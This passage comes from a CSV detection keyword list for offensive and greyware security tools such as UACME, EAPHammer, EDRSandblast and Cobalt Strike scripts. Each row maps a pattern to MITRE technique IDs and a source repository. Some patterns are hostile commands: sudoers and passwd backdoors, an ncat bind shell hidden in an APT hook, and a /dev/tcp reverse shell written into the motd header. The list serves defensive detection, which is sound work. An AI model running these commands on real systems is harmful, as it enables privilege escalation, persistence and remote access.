ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,0,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,0,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*E11DC25D-E96D-495D-8968-1BA09C95B673*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,0,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*e1cd2b55-3b4f-41bd-a168-40db41e34349*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,0,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*E54195F0-060C-4B24-98F2-AD9FB5351045*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,0,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*E82BCAD1-0D2B-4E95-B382-933CF78A8128*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*E991E6A7-31EA-42E3-A471-90F0090E3AFD*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*eaphammer*,offensive_tool_keyword,EAPHammer,EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands,T1553 - T1560 - T1569 - T1590 - T1591,TA0002 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/s0lst1c3/eaphammer,1,0,N/A,N/A,10,1825,296,2023-09-17T10:13:21Z,2017-02-04T01:03:39Z -*eapmd5tojohn*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*easinvoker.exe*System32*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*EasyHook-Managed*InjectionLoader.cs*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*EasyHook-Managed*WOW64Bypass.*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*EasyHook-Managed/LocalHook.cs*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*EasyPersistent.cna*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*Ebowla-master.zip*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*echo * .bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*echo * /home/*/.bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*echo * /root/.bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*echo * > \\.\pipe\*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*,greyware_tool_keyword,sudoers,use SUDO without password,T1548.002 - T1059.004 - T1078.004,TA0004 - TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*,greyware_tool_keyword,sudoers,use SUDO without password,T1548.002 - T1059.004 - T1078.004,TA0004 - TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*echo *%sudo ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*,greyware_tool_keyword,sudo,Sudo Persistence via sudoers file,T1078 - T1166,TA0003,N/A,N/A,Persistence,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*echo */24 | dnsx -silent -resp-only -ptr*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*echo *::0:0::/root:/bin/bash* >>/etc/passwd*,greyware_tool_keyword,bash,add a passwordless user ,T1136.001 - T1059.004 - T1078.004,TA0005 - TA0002 - TA0004,N/A,N/A,Persistence,N/A,1,0,N/A,8,8,N/A,N/A,N/A,N/A -*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*,greyware_tool_keyword,bash,Backdooring APT,T1059.004 - T1574.001 - T1027,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*echo *bailing. try a different name\*,greyware_tool_keyword,tmpwatch,Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time,T1070.004 - T1059 - T1047,TA0007 - TA0002 - TA0040,N/A,N/A,N/A,https://linux.die.net/man/8/tmpwatch,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*,greyware_tool_keyword,bash,Backdooring Message of the Day,T1059.004 - T1574.001 - T1027,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*echo [.ShellClassInfo] > desktop.ini*,greyware_tool_keyword,attrib,NTLM Leak via Desktop.ini,T1555.003 - T1081.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*echo 123 > c:\windows\temp\test.txt*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*echo '8.8.8.8' | hakrevdns*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*echo IconResource=\\*\* >> desktop.ini*,greyware_tool_keyword,attrib,NTLM Leak via Desktop.ini,T1555.003 - T1081.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*echo -n 'cmd /c start rundll32 *.dll* | base64*,offensive_tool_keyword,AD exploitation cheat sheet,Generate EncodedCommand,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*echo nc -l -p * > *.bat*,greyware_tool_keyword,nc,Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*echo 'PEzor!!*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*echoac-poc-main*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,1,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*echowrecker*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*ecryptfs2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ecs_task_def_data/all_task_def.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*Ed1s0nZ/cool/*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*edge_wscript_wsh_injection*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*edge1.parrot.run*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*EditC2Dialog.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*edknjdjielmpdlnllkdmaghlbpnmjmgb*,greyware_tool_keyword,Muscle VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*edraser.py -*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*EDRaser-main*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*EDRSandblast.c*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*EDRSandblast.exe*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z 